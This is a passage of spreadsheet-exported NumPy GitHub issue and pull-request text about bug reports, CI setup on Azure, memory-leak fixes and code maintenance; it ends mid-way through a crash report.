  </si>
  <si>
    <t>['01 - Enhancement', '03 - Maintenance', 'component: __array_function__', 'component: numpy.core']</t>
  </si>
  <si>
    <t>I was asked to add a doc version selector for our pages; this PR attempts to do that._x000D_
_x000D_
~~It is loosely based on the skimage approach to doing this, but instead of more tightly_x000D_
integrating with the doc template machinery I've effectively anchored it below_x000D_
the search box at the moment.~~_x000D_
_x000D_
There are probably a few issues I haven't though of, but seems ok as a draft approach_x000D_
locally. Not sure about portability to older doc builds if there's a desire to rebuild for them_x000D_
eventually._x000D_
_x000D_
TODO: _x000D_
_x000D_
- [ ] best way to test the javascript time-travelling without experimentally re-deploying docs online? esp. given the vastly different local "URL" vs. online; could unit test the javascript functions but ugh_x000D_
- [x] move the version selector menu to the top left of the page, similar to CPython docs, because it is otherwise at the mercy of margin content length in left column below search box (where it is currently anchored)_x000D_
- [ ] add support for travelling to online devdocs from local devdocs?_x000D_
- [ ] add support for the different base url used by devdocs_x000D_
- [ ] decide if we're going to aim to rebuild older doc versions online to allow bidirectional time-travels--how much work to "backport" the menu patch to historical docs?_x000D_
- [ ] remove debug console code &amp; clean up javascript indent / formatting when ready to merge_x000D_
- [ ] remove extraneous content remaining from the CPython docs javascript used as the foundation, and probably credit them for foundation code_x000D_
- [ ] the drop-down version selector menu is currently way too wide</t>
  </si>
  <si>
    <t>WIP, DOC: add doc version selector</t>
  </si>
  <si>
    <t>['01 - Enhancement', '04 - Documentation', '25 - WIP', '55 - Needs work', 'component: Documentation']</t>
  </si>
  <si>
    <t>Otherwise it is hard to impossible to figure out what is the actual_x000D_
value which fails the test._x000D_
_x000D_
See e.g. failing on 3.4 (only) tests of nibabel:_x000D_
https://ci.appveyor.com/project/nipy/nibabel/build/1.0.498/job/eechfm1kxroa0rju#L598</t>
  </si>
  <si>
    <t>Provide information about what kind is actually not integer kind</t>
  </si>
  <si>
    <t>`timedelta64` allows for multiplication and division, but not for `remainder`_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; a = np.timedelta64(7, 's')_x000D_
&gt;&gt;&gt; b = np.timedelta64(3, 's')_x000D_
&gt;&gt;&gt; c = np.timedelta64(1, 's')_x000D_
&gt;&gt;&gt; a == b*2 + c_x000D_
True_x000D_
&gt;&gt;&gt; a / 2_x000D_
numpy.timedelta64(3,'s')_x000D_
&gt;&gt;&gt; a / b_x000D_
2.3333333333333335_x000D_
```_x000D_
I would expect that ` a  %  b  ==  c` and ` a % 2 == c`_x000D_
but_x000D_
```_x000D_
&gt;&gt;&gt; a % b_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
TypeError: ufunc 'remainder' not supported for the input types, and the inputs could not be safely coerced to any supported types according to the casting rule ''safe''_x000D_
&gt;&gt;&gt; a % 2_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
TypeError: ufunc 'remainder' not supported for the input types, and the inputs could not be safely coerced to any supported types according to the casting rule ''safe''_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
```_x000D_
&gt;&gt;&gt; import sys, numpy; print(numpy.__version__, sys.version)_x000D_
1.15.2 3.6.5 (default, Apr  6 2018, 12:22:55) _x000D_
[GCC 4.2.1 Compatible Apple LLVM 9.1.0 (clang-902.0.39.1)]_x000D_
```</t>
  </si>
  <si>
    <t>remainder is not implemented for timedelta64</t>
  </si>
  <si>
    <t xml:space="preserve">This PR gathers the changes to the CI images/script needed to test correctly the contents of the PR #12011, that implements pickle protocol 5 for numpy arrays. _x000D_
_x000D_
For python 3.6 and 3.7,  using pickle protocol 5 is possible only thanks to the `pickle5` module. As we enable the use of `pickle5` in the aforementioned PR,, we install the pickle5 module in some setups involving python 3.6 and 3.7 in order to test those functionalities._x000D_
_x000D_
Pinging @ogrisel and @mattip </t>
  </si>
  <si>
    <t>TST: Install pickle5 for CI testing with python 3.6/7</t>
  </si>
  <si>
    <t xml:space="preserve">`np.ndarray.dumps` and `np.ndarray.dump` will now let the user specify a pickle protocol._x000D_
 _x000D_
pickling tests now loop over all possible protocols. _x000D_
_x000D_
Part of #12011, that implements pickle protocol 5 for numpy arrays (this PR is currently being broken out in multiple shorter PRs for simplification and clarity purposes). _x000D_
_x000D_
pinging @ogrisel @mattip _x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>TST, MAINT: Update pickling tests by making them loop over all protocols</t>
  </si>
  <si>
    <t>### Reproducing code example:_x000D_
_x000D_
```python_x000D_
from numpy import f2py_x000D_
f2py.compile('''_x000D_
      SUBROUTINE FOO()_x000D_
      END_x000D_
''')_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
On a system with many CPUs:_x000D_
_x000D_
```_x000D_
running build_x000D_
running config_cc_x000D_
unifing config_cc, config, build_clib, build_ext, build commands --compiler options_x000D_
running config_fc_x000D_
unifing config_fc, config, build_clib, build_ext, build commands --fcompiler options_x000D_
running build_src_x000D_
build_src_x000D_
building extension "untitled" sources_x000D_
f2py options: []_x000D_
f2py:&gt; /tmp/tmpbxJPEk/src.linux-ppc64le-2.7/untitledmodule.c_x000D_
creating /tmp/tmpbxJPEk/src.linux-ppc64le-2.7_x000D_
Reading fortran codes..._x000D_
    Reading file '/tmp/tmpZ7UZp4.f' (format:fix,strict)_x000D_
Post-processing..._x000D_
    Block: untitled_x000D_
            Block: foo_x000D_
Post-processing (stage 2)..._x000D_
Building modules..._x000D_
    Building module "untitled"..._x000D_
        Constructing wrapper function "foo"..._x000D_
          foo()_x000D_
    Wrote C/API module "untitled" to file "/tmp/tmpbxJPEk/src.linux-ppc64le-2.7/untitledmodule.c"_x000D_
  adding '/tmp/tmpbxJPEk/src.linux-ppc64le-2.7/fortranobject.c' to sources._x000D_
  adding '/tmp/tmpbxJPEk/src.linux-ppc64le-2.7' to include_dirs._x000D_
copying /home/jdemeyer/sage-git/local/lib/python2.7/site-packages/numpy/f2py/src/fortranobject.c -&gt; /tmp/tmpbxJPEk/src.linux-ppc64le-2.7_x000D_
copying /home/jdemeyer/sage-git/local/lib/python2.7/site-packages/numpy/f2py/src/fortranobject.h -&gt; /tmp/tmpbxJPEk/src.linux-ppc64le-2.7_x000D_
build_src: building npy-pkg config files_x000D_
running build_ext_x000D_
customize UnixCCompiler_x000D_
customize UnixCCompiler using build_ext_x000D_
get_default_fcompiler: matching types: '['gnu95', 'intel', 'lahey', 'pg', 'absoft', 'nag', 'vast', 'compaq', 'intele', 'intelem', 'gnu', 'g95', 'pathf95', 'nagfor']'_x000D_
customize Gnu95FCompiler_x000D_
Found executable /usr/bin/gfortran_x000D_
Found executable /usr/bin/ld_x000D_
Found executable /usr/bin/ar_x000D_
Found executable /usr/bin/ranlib_x000D_
customize Gnu95FCompiler_x000D_
customize Gnu95FCompiler using build_ext_x000D_
building 'untitled' extension_x000D_
compiling C sources_x000D_
C compiler: gcc -fno-strict-aliasing -g -O2 -DNDEBUG -g -fwrapv -O3 -Wall -Wno-unused -fPIC_x000D_
_x000D_
creating /tmp/tmpbxJPEk/tmp_x000D_
creating /tmp/tmpbxJPEk/tmp/tmpbxJPEk_x000D_
creating /tmp/tmpbxJPEk/tmp/tmpbxJPEk/src.linux-ppc64le-2.7_x000D_
compile options: '-I/tmp/tmpbxJPEk/src.linux-ppc64le-2.7 -I/home/jdemeyer/sage-git/local/lib/python2.7/site-packages/numpy/core/include -I/home/jdemeyer/sage-git/local/_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;string&gt;", line 1, in &lt;module&gt;_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/site-packages/numpy/f2py/f2py2e.py", line 648, in main_x000D_
    run_compile()_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/site-packages/numpy/f2py/f2py2e.py", line 633, in run_compile_x000D_
    setup(ext_modules=[ext])_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/site-packages/numpy/distutils/core.py", line 169, in setup_x000D_
    return old_setup(**new_attr)_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/distutils/core.py", line 151, in setup_x000D_
    dist.run_commands()_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/distutils/dist.py", line 953, in run_commands_x000D_
    self.run_command(cmd)_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/distutils/dist.py", line 972, in run_command_x000D_
    cmd_obj.run()_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/site-packages/numpy/distutils/command/build.py", line 47, in run_x000D_
    old_build.run(self)_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/distutils/command/build.py", line 127, in run_x000D_
    self.run_command(cmd_name)_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/distutils/cmd.py", line 326, in run_command_x000D_
    self.distribution.run_command(command)_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/distutils/dist.py", line 972, in run_command_x000D_
    cmd_obj.run()_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/site-packages/numpy/distutils/command/build_ext.py", line 262, in run_x000D_
    self.build_extensions()_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/distutils/command/build_ext.py", line 449, in build_extensions_x000D_
    self.build_extension(ext)_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/site-packages/numpy/distutils/command/build_ext.py", line 380, in build_extension_x000D_
    **kws)_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/site-packages/numpy/distutils/ccompiler.py", line 337, in CCompiler_compile_x000D_
    pool = multiprocessing.pool.ThreadPool(jobs)_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/multiprocessing/pool.py", line 732, in __init___x000D_
    Pool.__init__(self, processes, initializer, initargs)_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/multiprocessing/pool.py", line 161, in __init___x000D_
    self._repopulate_pool()_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/multiprocessing/pool.py", line 225, in _repopulate_pool_x000D_
    w.start()_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/multiprocessing/dummy/__init__.py", line 75, in start_x000D_
    threading.Thread.start(self)_x000D_
  File "/home/jdemeyer/sage-git/local/lib/python2.7/threading.py", line 736, in start_x000D_
    _start_new_thread(self.__bootstrap, ())_x000D_
thread.error: can't start new thread_x000D_
```_x000D_
_x000D_
This works fine with numpy-1.14.6 but not with numpy-1.15.0_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```_x000D_
1.15.2_x000D_
```_x000D_
```_x000D_
2.7.15 (default, Aug  9 2018, 23:53:06) \n[GCC 5.4.0 20160609]'_x000D_
```_x000D_
_x000D_
Also relevant:_x000D_
```_x000D_
sage: from numpy.distutils.misc_util import get_num_build_jobs_x000D_
sage: get_num_build_jobs()_x000D_
192_x000D_
```</t>
  </si>
  <si>
    <t>f2py spawns a huge number of threads</t>
  </si>
  <si>
    <t xml:space="preserve">### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
In [20]: a = np.array([[1,2,3],[5,4,3]])_x000D_
_x000D_
In [21]: a[5]_x000D_
---------------------------------------------------------------------------_x000D_
IndexError                                Traceback (most recent call last)_x000D_
/home/nedcr/ClimateRisk/downscaling-tool/scripts/nanaimo_test.py in &lt;module&gt;()_x000D_
----&gt; 1 a[5]_x000D_
_x000D_
IndexError: index 5 is out of bounds for axis 0 with size 2_x000D_
_x000D_
In [22]: a[5:]_x000D_
Out[22]: array([], shape=(0, 3), dtype=int64)_x000D_
_x000D_
In [23]: a[5:7]_x000D_
Out[23]: array([], shape=(0, 3), dtype=int64)_x000D_
_x000D_
```_x000D_
_x000D_
These results are potentially problematic, because poor indexing could lead to incorrect results in some calculations. Is there a reason why a KeyError isn't thrown here?_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```_x000D_
1.13.3 3.6.6 (default, Sep 12 2018, 18:26:19) _x000D_
[GCC 8.0.1 20180414 (experimental) [trunk revision 259383]]_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>Numpy should throw a KeyError when slicing with out-of-bounds indexes</t>
  </si>
  <si>
    <t xml:space="preserve">These fixes are backported from master._x000D_
_x000D_
- Mark test_f2py as xfail. The test is unreliable, as the installation path_x000D_
  may depend on the environment in ways we cannot control._x000D_
- Skip test_semicolon_split on Mac. The tests fails for reasons not yet_x000D_
  determined._x000D_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</si>
  <si>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MAINT: Fix some failing tests on azure-pipelines mac and windows.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '05 - Testing', '08 - Backport']</t>
  </si>
  <si>
    <t xml:space="preserve">There's an [open CPython bug](https://bugs.python.org/issue9949) that `os.path.realpath()` does not follow symlinks on Windows, and this has been causing issues in the Azure Windows CI testing. The NumPy `memmap` class [uses `resolve()` internally](https://github.com/numpy/numpy/blob/master/numpy/core/memmap.py#L274)._x000D_
_x000D_
The scope of this PR does not include modernizing other parts of the test, including use of discouraged `mktemp`, as noted in #12071._x000D_
</t>
  </si>
  <si>
    <t>BUG: test_path() now uses Path.resolve()</t>
  </si>
  <si>
    <t xml:space="preserve">The appveyor webhook is deactivated, so we need to use azure to_x000D_
test backports on windows before the next 1.15.x release. This_x000D_
also add testing on the Mac._x000D_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</si>
  <si>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Add azure CI testing to 1.15.x branch.</t>
  </si>
  <si>
    <t xml:space="preserve">Requested by @charris since we can use up to 10 parallel jobs for free._x000D_
</t>
  </si>
  <si>
    <t>TST: Add Python 3.5 to Azure windows CI.</t>
  </si>
  <si>
    <t>Attempt to replicate the 5 Appveyor Windows CI matrix entries on Azure service, and purge parallel pytest runs from Azure for the time being, until test suite is thread safe. Motivation is to cut CI time from sometimes &gt; 1 hr to the tens of minutes range. I suspect we'll have a phase where we retain both appveyor and Azure windows for a bit to test things out._x000D_
_x000D_
Testing on my fork shows excellent consistency between Azure / Appveyor test results, but a reviewer should likely do some spot checks._x000D_
_x000D_
Also, if someone is familiar with x64 vs. x86 interpreter / architecture stuff -- checking things on Azure vs. Appveyor in this regard might be useful, but fork shows all green for both archs.</t>
  </si>
  <si>
    <t>TST: add Windows test matrix to Azure CI</t>
  </si>
  <si>
    <t xml:space="preserve">Extend the blacklist to MSVC 2017 and add functions_x000D_
_x000D_
- CSQRT_x000D_
- CSQRTF_x000D_
- CSQRTL_x000D_
- CLOG_x000D_
- CLOGF_x000D_
- CLOGL_x000D_
- CACOS_x000D_
- CACOSF_x000D_
- CACOSL_x000D_
- CACOSH_x000D_
- CACOSHF_x000D_
- CACOSHL_x000D_
_x000D_
See comment from cgholke at issue #11855. Maybe closes #12078._x000D_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</si>
  <si>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Blacklist some MSVC complex functions.</t>
  </si>
  <si>
    <t xml:space="preserve">New issue in order to continue the discussion at #12051._x000D_
_x000D_
We have complex number test failures when the NumPy mathlib is compiled with MSVC._x000D_
_x000D_
&lt;!--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import numpy as np_x000D_
&lt;&lt; your code here &gt;&gt;_x000D_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t>
  </si>
  <si>
    <t xml:space="preserve">MSVC Test failures  </t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
We use swig/cereal with numpy and have found a possible discrepancy._x000D_
_x000D_
What we have works with numpy 1.14.3, but does not with 1.15.2_x000D_
_x000D_
It's entirely probable that we are misusing SWIG and numpy_x000D_
_x000D_
The code can be found here: https://github.com/Dekken/tick/blob/col_maj/tick/array/tests/serialize_test.py#L63_x000D_
_x000D_
Travis build showing errors for python 3.7 - I've tested python 3.7 with numpy 1.14.3 and it works._x000D_
https://travis-ci.org/X-DataInitiative/tick/builds/436711891_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
row_array = np.array([[1, 2.1, 5], [0, 4, 1]])_x000D_
col_array = np.asfortranarray(row_array)_x000D_
_x000D_
serialize_array(col_array, self.array_file)_x000D_
# our serializing swig/cereal function_x000D_
serialized_col_array = load_array(self.array_file, array_dim=2,_x000D_
                                      dtype=self.dtype,_x000D_
                                      major="col")_x000D_
np.testing.assert_array_almost_equal(col_array, np.asfortranarray(row_array))_x000D_
np.testing.assert_array_almost_equal(col_array, row_array)_x000D_
np.testing.assert_array_almost_equal(col_array, serialized_col_array)       _x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
Failing test: https://travis-ci.org/X-DataInitiative/tick/jobs/436711893#L3550</t>
  </si>
  <si>
    <t xml:space="preserve">SWIG C_CONTIGUOUS / F_CONTIGUOUS </t>
  </si>
  <si>
    <t>Add a hex version to `version.py` as well as caching it in C when first called. This is a step toward using the current NumPy version in `PyUFuncObject`, as requested in PR #11175._x000D_
_x000D_
The hex version is based on the `PY_VERSION_HEX` macro from CPython._x000D_
_x000D_
I also aggregated the other functions that deal with versions into `common/npy_version.c`</t>
  </si>
  <si>
    <t>ENH: add hex version, move code to common</t>
  </si>
  <si>
    <t>This avoids a few memory copies in `numpypolynomial.hermite*` by using `np.full` instead of `cst*np.ones`, with hopefully some marginal run time benefits.</t>
  </si>
  <si>
    <t>MAINT Avoid some memory copies in numpy.polynomial.hermite</t>
  </si>
  <si>
    <t>['03 - Maintenance', '59 - Needs tests', 'component: numpy.polynomial']</t>
  </si>
  <si>
    <t xml:space="preserve">When a masked array of dtype float32 is converted to uint8, the dtype of the fill_value persists. When setting the fill_value to a uint8 value, the value is converted to float. Filling such an array yields an array of dtype object._x000D_
_x000D_
This was working in numpy==1.14._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
foo = np.ma.masked_equal(np.arange(10, dtype="float32"), 5)_x000D_
foo.fill_value = -1.0_x000D_
bar = foo.astype("uint8")_x000D_
print(bar.fill_value)_x000D_
bar.fill_value = 255_x000D_
print(bar.fill_value)_x000D_
print(bar.filled().dtype)_x000D_
```_x000D_
### Error message:_x000D_
with numpy==1.14.2 this yields:_x000D_
```_x000D_
255_x000D_
255_x000D_
uint8_x000D_
```_x000D_
_x000D_
with numpy==1.15.2 this yields:_x000D_
```_x000D_
-1.0_x000D_
255.0_x000D_
object_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
Tested with python 2.7 and 3.5.2_x000D_
numpy==1.15_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Converting masked array from float to uint8 does not convert dtype of fill_value</t>
  </si>
  <si>
    <t>Related to #12066 and observed [in logs](https://dev.azure.com/numpy/numpy/_build/results?buildId=11&amp;view=logs) from #12067. _x000D_
_x000D_
This assumes that the error there is not related to the change in the patch, but I'm quite certain I've seen this error before when working on my fork for Azure mac os. It seems less common than the other one I've already placed a Darwin-specific skip decorator on, but we probably don't want stochastic fails in our CI._x000D_
_x000D_
Ideally we'd understand the reason, but this is both a new CI platform and I'm using parallel testing more than we have before for CI so any unit test that is state dependent on related or unrelated tests will likely be more vulnerable to execution order issues and so on.</t>
  </si>
  <si>
    <t>TST: skip test_callstatement() on MacOS</t>
  </si>
  <si>
    <t>During module initialization, getlimits.py previously called numpy code before all of numpy was loaded,_x000D_
which often causes circular import issues. This PR delays getlimits init._x000D_
_x000D_
This partly reverts and also continues PR #9113. Here, I made the whole of getlimits delay initialization. It's not good for any numpy code at all to be run before numpy is fully loaded._x000D_
_x000D_
Fixes #12063</t>
  </si>
  <si>
    <t>MAINT: delay initialization of getlimits (circular imports)</t>
  </si>
  <si>
    <t>Fixes #11993_x000D_
_x000D_
The problem was `OBJECT_to_*` did not quit on error, and the error was cleared by subsequent calls (in `PyArray_IsScalar` in `CDOUBLE_setitem`, it seems). Probably in python3.7 they must have added a call to `PyErr_Clear` somewhere, which exposed this bug.</t>
  </si>
  <si>
    <t>BUG: `OBJECT_to_*` should check for errors</t>
  </si>
  <si>
    <t>MAINT: remove redundant imports</t>
  </si>
  <si>
    <t>Remove some more unused stdlib imports.</t>
  </si>
  <si>
    <t>MAINT: remove unused stdlib imports</t>
  </si>
  <si>
    <t>MAINT: remove redundant assignment</t>
  </si>
  <si>
    <t>MAINT: remove unused imports</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.core', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>See https://github.com/numpy/numpy/blob/a000144df/numpy/f2py/crackfortran.py#L3253 for the function signature.</t>
  </si>
  <si>
    <t>MAINT: The crackfortran function is called with an extra argument</t>
  </si>
  <si>
    <t>MAINT: avoid modifying mutable default values</t>
  </si>
  <si>
    <t>Related to #12036._x000D_
_x000D_
I figured I'd start this with Mac OS for Azure because that platform is absent from our current github-integrated CI, which perhaps reduces the pressure to replicate a current matrix entry &amp; allows restoration of a common platform to the test matrix with apparently short queues at the moment._x000D_
_x000D_
I tried to add detailed notes to the `yml` file. I think the discussion surrounding test &amp; support for accelerate on mac is tricky, perhaps in no small part to the opacity of the resolution of bugs there and so on._x000D_
_x000D_
If we want to expand the matrix or try an `x86` arch target or whatever else I suppose that may be something to discuss. My impression is that we may want to focus the 10 free parallel jobs on Azure mostly to relieve current Windows bottlenecks._x000D_
_x000D_
[All tests are passing on my fork with this PR branch](https://dev.azure.com/tylerjereddy/numpy-test/_build/results?buildId=84&amp;view=logs). You can see some helpful stats on the [test data page](https://dev.azure.com/tylerjereddy/numpy-test/_build/results?buildId=84&amp;view=ms.vss-test-web.test-result-details), including the drop in test time from the previous run when a single core was used for pytest._x000D_
_x000D_
As usual, getting to "all green" on the tests with a new platform was a bit painful -- my compromise was to add 1 more `skipif` decorator on a single `f2py` test. `f2py` is always a "treat" to work with, but homebrew gfortran mostly seems to play ok with it._x000D_
_x000D_
If core devs / steering committe would like, I can look into trying to activate the github hook for azure so we can see it on this PR for NumPy repo proper -- otherwise, one of the "owners" may have to do that._x000D_
_x000D_
cc Microsoft folks who commented elsewhere: @ericsciple @chrisrpatterson</t>
  </si>
  <si>
    <t>TST: add macos azure testing to CI</t>
  </si>
  <si>
    <t>Sphinx 1.8.0 requires updating style templates. Ours is from scipy/scipy-sphinx-theme, and has not (as of this PR) been updated. This causes issue #12044 (broken quicksearch) for us which has been opened upstream as issue scipy/scipy-sphinx-theme#9 and is being discussed in sphinx at issue sphinx-doc/sphinx#5460 as well._x000D_
_x000D_
I propose pinning sphinx to version 1.7.9 until the dust settles around the 1.8 transition.</t>
  </si>
  <si>
    <t>BLD: pin sphinx to 1.7.9</t>
  </si>
  <si>
    <t>Improvements in lib.arraysetops:_x000D_
1. Added axis argument in isin, as new function definition in: intersect, setxor, union, setdiff_x000D_
2. Added retrun_index argument in setxor1d_x000D_
3. Proposal: The in1d function should be more optimised in some cases - if all array elements are very likely but not gurenteed to be unique. Maybe we could have a function that reduces the checking-overhead after an element of the first vector has been confirmed to be in the secound, similar to numpy.core.multiarray._vec_string on c level. Alternatively make in1d assume_unique=True somehow work for non unique arrays?_x000D_
_x000D_
!! this is in an 80% good state, because i was on a time limit._x000D_
! might need to address #11999.</t>
  </si>
  <si>
    <t>ENH:  Adding to API of isin, setxor1d  -  Adding of functions with 1D-units: intersect, setxor, union, setdiff -  Proposal for isin Performance.</t>
  </si>
  <si>
    <t>#11694 (and backport #11785) added a special case for datetime64 and timedelta63 scalars. This case used `_append_char` earlier than before so now `_tmp_string_t` must be freed in the fail label.</t>
  </si>
  <si>
    <t>BUG: fix memory leak of buffer format string</t>
  </si>
  <si>
    <t>I think this organization makes a little more sense, especially when thinking_x000D_
about what the functions we want to write in C should look like._x000D_
_x000D_
CC @mhvk_x000D_
_x000D_
xref https://github.com/numpy/numpy/issues/12028</t>
  </si>
  <si>
    <t>MAINT: cleanup and better document core/overrides.py</t>
  </si>
  <si>
    <t>Continuation of PR #11893 _x000D_
_x000D_
Running _x000D_
```_x000D_
flake8 --select F811 `find numpy -name "*.py"`_x000D_
``` _x000D_
exposed duplicate imports.</t>
  </si>
  <si>
    <t>MAINT: remove duplicate imports</t>
  </si>
  <si>
    <t>DOC: Note MSVC compiler versions needed on Windows for runtests.py</t>
  </si>
  <si>
    <t>['04 - Documentation', '05 - Testing', '54 - Needs decision']</t>
  </si>
  <si>
    <t>`numpy.maximum` now raises a RuntimeWarning when encountering a NaN, but the documentation says it propagates NaNs and even goes to the trouble of saying exactly how they are propagated, which makes it seem like it shouldn't give a warning._x000D_
_x000D_
### Reproducing code example:_x000D_
```python_x000D_
In [1]: import numpy as np_x000D_
_x000D_
In [2]: x = np.array([1, 2, np.nan], dtype=float)_x000D_
_x000D_
In [3]: np.maximum(x, x)_x000D_
/home/tudor/anaconda3/bin/ipython:1: RuntimeWarning: invalid value encountered in maximum_x000D_
  #!/home/tudor/anaconda3/bin/python_x000D_
Out[3]: array([ 1.,  2., nan])_x000D_
_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```python_x000D_
In [6]: import sys, numpy; print(numpy.__version__, sys.version)_x000D_
1.15.1 3.6.6 |Anaconda custom (64-bit)| (default, Jun 28 2018, 17:14:51)_x000D_
[GCC 7.2.0]_x000D_
```</t>
  </si>
  <si>
    <t>numpy.maximum since 1.15 raises RuntimeWarning when encountering a NaN even though the docs say it should propagate NaNs</t>
  </si>
  <si>
    <t>['06 - Regression', '54 - Needs decision']</t>
  </si>
  <si>
    <t>Memory leak when slicing derived classes from Numpy. Slicing without using the derived classes produces no memory leak. The size of the memory leak is dependent on the size of the sliced array (post-slicing). The memory leak is not visible in the objects managed by Python: that is, the number of objects managed by Python doesn't increase with more iterations in the for loop below._x000D_
_x000D_
The code example follows closely the current documentation on derived classes, more specifically [here](https://docs.scipy.org/doc/numpy/user/basics.subclassing.html#slightly-more-realistic-example-attribute-added-to-existing-array)._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
import time_x000D_
_x000D_
class Field(np.ndarray):_x000D_
    def __new__(cls, arr):_x000D_
        obj = np.asarray(arr).view(cls)_x000D_
        return obj_x000D_
	_x000D_
    def __array_finalize__(self, obj):_x000D_
        if obj is None:_x000D_
            return_x000D_
_x000D_
N = 256*256_x000D_
_x000D_
B = np.zeros(N)_x000D_
B[:N/2] = 1_x000D_
_x000D_
# Memory leak depending on which of the following lines is executed_x000D_
A = Field(np.random.rand(N))_x000D_
#A = np.random.rand(N)_x000D_
_x000D_
for i in np.arange(10000):_x000D_
    if i % 100 == 0:_x000D_
        print(i)_x000D_
        time.sleep(0.01)_x000D_
	_x000D_
    # Memory leak in following line_x000D_
    res = A[B&gt;0]_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
No error message is produced._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Problem occurs for both Python 3.6.6 and Python 2.7.15. I didn't check other version._x000D_
Problem is not present in Numpy 1.14.5 but is present in both Numpy 1.15.1 and 1.15.2.</t>
  </si>
  <si>
    <t>Memory leak when slicing derived classes from Numpy</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', 'component: numpy.core', 'good first issue']</t>
  </si>
  <si>
    <t>This was discussed a bit on the mailing list--I've done a little testing on my fork of NumPy._x000D_
_x000D_
A [sample PR](https://github.com/tylerjereddy/numpy/pull/1) shows the github integration in action for a MacOS job. The `numpy_azure` branch contains the `.yml` file, and the PR is opened against that._x000D_
_x000D_
MacOS tests don't all pass there yet. Looks like it took 3 minutes, 17 seconds for the full run.</t>
  </si>
  <si>
    <t>TST: Azure testing with NumPy</t>
  </si>
  <si>
    <t>['57 - Close?', 'component: numpy.testing']</t>
  </si>
  <si>
    <t>I think that `tmp` could leak on python 3 if `_append_char` causes an early exit.</t>
  </si>
  <si>
    <t>BUG: Fix memory leak in PY3K buffer code.</t>
  </si>
  <si>
    <t xml:space="preserve">Otherwise the deprecation message is not that helpful as I have to dig_x000D_
through the source to find out since when and whether conditional import_x000D_
is necessary in my code. I may not have numpy on my dev machine (this_x000D_
message was on CI). So it's one extra step for the consumer._x000D_
_x000D_
That's also for you, you have more chance of having consumer update_x000D_
their code when they have more informations in the deprecation message,_x000D_
so you can drop old code faster !_x000D_
_x000D_
At least kudo to Charles Harris for including a comments just above,_x000D_
that prevented me from having to git blame and go spelunking for knowing_x000D_
which versions were or not affected._x000D_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</si>
  <si>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Add version deprecated to some deprecation messages.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '07 - Deprecation', 'component: numpy.testing']</t>
  </si>
  <si>
    <t>Context:_x000D_
_x000D_
When running the tests via `python [ROOT DIR]/runtests.py` on windows linux subsystem a test fails with respect to f2py, f2py3, f2py3.6._x000D_
_x000D_
This is despite the fact that f2py exists in the my path, however I don't have f2py3 or f2py3.6 which shouldn't be required for the tests to pass._x000D_
_x000D_
closes gh-10016</t>
  </si>
  <si>
    <t>TST: Mark check for f2py script xfail.</t>
  </si>
  <si>
    <t>Fixes #12031. by checking the return value from `PyArray_PromoteTypes`. Also make sure to decref `otmp` on error.</t>
  </si>
  <si>
    <t>BUG: check return value from PyArray_PromoteTypes</t>
  </si>
  <si>
    <t>NULL pointer derference in PyArray_ConvertToCommonType_x000D_
```_x000D_
import numpy_x000D_
numpy.half(-1).choose(numpy.void(1), numpy.broadcast_arrays((1,)))_x000D_
```_x000D_
gdb info_x000D_
```_x000D_
[----------------------------------registers-----------------------------------]_x000D_
RAX: 0xc0400001756 --&gt; 0x0 _x000D_
